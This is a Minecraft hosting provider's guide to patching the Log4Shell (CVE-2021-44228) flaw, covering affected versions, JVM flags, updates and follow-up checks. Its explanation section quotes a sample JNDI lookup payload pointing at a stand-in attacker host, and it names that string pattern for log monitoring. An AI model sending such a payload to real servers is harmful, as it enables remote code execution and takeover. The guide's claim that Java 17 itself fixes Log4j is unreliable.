How to Protect Your Server from the Log4j Vulnerability
Learn how to patch the Log4Shell (CVE-2021-44228) vulnerability on your Minecraft server.
The Log4j vulnerability (Log4Shell, CVE-2021-44228) was a critical security flaw discovered in December 2021 that affected Minecraft servers. It allowed attackers to execute arbitrary code by sending a specially crafted chat message.
Am I Affected?
| Minecraft Version | Affected? | Fix |
|---|---|---|
| 1.18.1+ | No | Patched by Mojang |
| 1.17–1.18 | Yes | Update or apply JVM flag |
| 1.12–1.16.5 | Yes | Apply JVM flag |
| 1.7–1.11 | Partially | Apply JVM flag |
| Below 1.7 | No | Uses older Log4j |
If you're running Minecraft 1.18.1 or newer, you're already safe. Mojang patched this in the official release.
Fixing the Vulnerability
Update to the latest version (recommended)
The simplest fix is updating to Minecraft 1.18.1 or later. Update your server JAR through Software Version on the XGamingServer panel.
Apply the JVM flag (for older versions)
If you can't update, add this JVM flag in Startup:
For Minecraft 1.12–1.18:
-Dlog4j2.formatMsgNoLookups=trueFor Minecraft 1.7–1.11, you need a patched Log4j configuration file. Download the official fix from Mojang and add:
-Dlog4j.configurationFile=log4j2_17-111.xmlUpdate Paper/Spigot
If you're running Paper or Spigot, update to the latest build for your Minecraft version. Both projects released patches shortly after the vulnerability was disclosed.
Restart the server
Restart from Console for the fix to take effect.
How the Exploit Worked
An attacker could send a chat message like:
${jndi:ldap://attacker-server.com/exploit}The Log4j library would process this string, connect to the attacker's server, download malicious code, and execute it — giving the attacker full control of the server machine.
Verifying the Fix
After applying the fix:
- Check your server's Java version — Java 17+ includes the Log4j fix
- Verify the JVM flag is active in
Consolestartup output - Test with a Log4j scanner (search "Log4Shell scanner" for safe testing tools)
Additional Security Measures
- Keep your server software updated
- Use a firewall to restrict outbound connections from the server
- Monitor server logs for suspicious
${jndi:strings - Use server logs to check for past exploitation attempts
⚠️ Warning: If your server was running an unpatched version during December 2021–early 2022 and was publicly accessible, it may have been compromised. Check for unfamiliar files, plugins, or scheduled tasks.
📝 Note: XGamingServer applied protective measures across all servers during the initial disclosure. If you're hosting with us, your server was protected. This guide is primarily for awareness and for anyone running custom server JARs.
See also: Find Server Logs | Server Types
If you need help, join our Discord.
How is this guide?
How to Install Plugins on Your Minecraft Server
Learn how to install plugins on your Minecraft server using the Plugin Manager or manual upload.
How to Install and Manage Datapacks on Your Minecraft Server
Learn how to install and manage datapacks for custom recipes, loot tables, and world generation on your server.